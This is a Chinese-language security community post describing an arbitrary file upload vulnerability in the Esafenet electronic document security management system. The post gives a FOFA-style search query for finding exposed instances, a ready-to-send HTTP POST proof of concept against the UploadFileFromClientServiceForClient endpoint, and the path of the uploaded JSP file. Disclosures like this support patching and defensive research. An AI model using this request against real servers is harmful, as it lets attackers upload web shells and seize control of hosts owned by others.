奇安信攻防社区-Esafenet 电子文档安全管理系统 UploadFileFromClientServiceForClient 任意文件上传漏洞

Esafenet 电子文档安全管理系统 UploadFileFromClientServiceForClient 任意文件上传漏洞

# Esafenet 电子文档安全管理系统 UploadFileFromClientServiceForClient 任意文件上传漏洞 ## 漏洞描述 Esafenet 电子文档安全管理系统 UploadFileFromClientServiceForClient 接口存在...

Esafenet 电子文档安全管理系统 UploadFileFromClientServiceForClient 任意文件上传漏洞
=================================================================

漏洞描述
----

Esafenet 电子文档安全管理系统 UploadFileFromClientServiceForClient 接口存在任意文件上传漏洞，攻击者通过漏洞可以上传任意文件到服务器中，获取主机权限

漏洞影响
----

Esafenet 电子文档安全管理系统

网络测绘
----

app="Esafenet-电子文档安全管理系统"

漏洞复现
----

登录页面

![img](https://shs3.b.qianxin.com/butian_public/f90969249212a118b047759b06c8b019229c918e239d1.jpg)

验证POC

```plain
POST /CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: */*
Content-Length: 1

Test
```

![img](https://shs3.b.qianxin.com/butian_public/f9827087ecc434788fc43aaca81265fdfeb0cd461d482.jpg)

```plain
/tttT.jsp
```

参考链接
----

<https://github.com/di0xide-U/YSTupload/blob/main/exp.md>

发表于 2024-07-12 18:45:54
阅读 ( 963 )
分类：Web应用

Esafenet 电子文档安全管理系统 UploadFileFromClientServiceForClient 任意文件上传漏洞

0 条评论